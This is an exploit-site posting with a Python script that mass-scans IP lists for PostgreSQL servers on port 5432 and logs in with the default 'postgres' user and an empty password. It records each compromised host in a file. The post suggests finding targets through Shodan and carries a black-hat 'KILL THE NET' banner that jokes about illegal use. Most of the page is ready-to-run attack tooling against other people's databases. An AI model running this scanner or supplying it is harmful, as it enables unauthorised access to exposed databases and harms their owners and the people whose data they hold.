PostgreSQL- Attack on default password

2019.04.11
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################## PostgreSQL- Attack on default password ########################## An easy way to get access to database without any brute force attack. [+]- Scan ips on port 5432 or Dork on Shodan. [+]-Exploit: user = "postgres" password = "" port = "5432" database = "postgres" and connect to databse. ########################## For mass scaning put your ip's on text file and run the script :) ########################## USAGE : python script.py ips.txt ---------------------------------------------- # -*- coding: utf-8 -* #!/usr/bin/python ##################################### ##KILL THE NET## #### PS: CHANGE Your Threads pool on line 105 to make script more faster :) ##############[LIBS]################### import os, sys, codecs, random, socket from multiprocessing.dummy import Pool import time from time import time as timer from platform import system from colorama import init try: import psycopg2 except ImportError: print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') print('[-] pip install psycopg2') print('[+] you need to install psycopg2 module (For MacOS try with brew)') sys.exit() init(autoreset=True) ########################################################################################## ktnred = '\033[31m' ktngreen = '\033[32m' ktn3yell = '\033[33m' ktn4blue = '\033[34m' ktn5purp = '\033[35m' ktn6blueblue = '\033[36m' ktn7grey = '\033[37m' CEND = '\033[0m' ##################################### ########################################################################################## try: with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f: ooo = f.read().splitlines() except IndexError: print (ktnred + '[+]================> ' + 'USAGE: '+sys.argv[0]+' listip.txt' + CEND) pass ooo = list((ooo)) ########################################################################################## def checkip(ooo): ip = ooo sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) killz = sock.connect_ex((ip,5432)) if killz == 0: print (ktn5purp + '[+]=[ GOOD IP: '+ ip +' ]=[+]' + CEND) connect(ip) else: print (ktnred + '[+]=[SOORY NOT GOOD IP: ' + ip +' ]=[+]' + CEND) pass def connect(ip): try: connection = psycopg2.connect(user = "postgres", password = "", host = ip, port = "5432", database = "postgres") cursor = connection.cursor() # Print PostgreSQL Connection properties print ( connection.get_dsn_parameters(),"\n") # Print PostgreSQL version cursor.execute("SELECT version();") record = cursor.fetchone() print("You are connected to - ", record, "\n") open('connected-db.txt', 'a').write('=='*5 + '[START]' + '=='*5 + '\n' + '[IP]: '+ ip + '\n'+'[USER: postgres, PASSWORD: NULL, PORT: 5432, DB: postgres]' + '\n' + '=='*5 + '[END]' + '=='*5 + '\n') except: print ("Error while connecting to PostgreSQL") ########################################################################################## ########################################################################################## def logo(): clear = "\x1b[0m" colors = [36, 32, 34, 35, 31, 37] x = ''' FEDERATION BLACK HAT SYSTEM | IG: @_gghost666_ <-.(`-') _ (`-') (`-').-> (`-') _<-. (`-')_ (`-') _(`-') __( OO) (_) <-. <-. ( OO).-> (OO )__ ( OO).-/ \( OO) ) ( OO).-/( OO).-> '-'. ,--.,-(`-'),--. ) ,--. ) / '._ ,--. ,'-'(,------.,--./ ,--/ (,------./ '._ | .' /| ( OO)| (`-') | (`-')|'--...__)| | | | | .---'| \ | | | .---'|'--...__) | /)| | )| |OO ) | |OO )`--. .--'| `-' |(| '--. | . '| |)(| '--. `--. .--' | . '(| |_/(| '__ |(| '__ | | | | .-. | | .--' | |\ | | .--' | | | |\ \| |'->| |' | |' | | | | | | | `---.| | \ | | `---. | | `--' '--'`--' `-----' `-----' `--' `--' `--' `------'`--' `--' `------' `--' KILL THE NET FB: fb/KtN.1990 Note! : We Accept any responsibility for any illegal usage :). ''' for N, line in enumerate(x.split("\n")): sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear)) time.sleep(0.05) pass logo() ########################################################################################## def Main(): try: start = timer() ThreadPool = Pool(50) Threads = ThreadPool.map(checkip, ooo) print('TIME TAKE: ' + str(timer() - start) + ' S') except: pass if __name__ == '__main__': Main()

References:

https://github.com/KTN1990/PostgreSQL--Attack-on-default-password-AUTOEXPLOITING
-


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top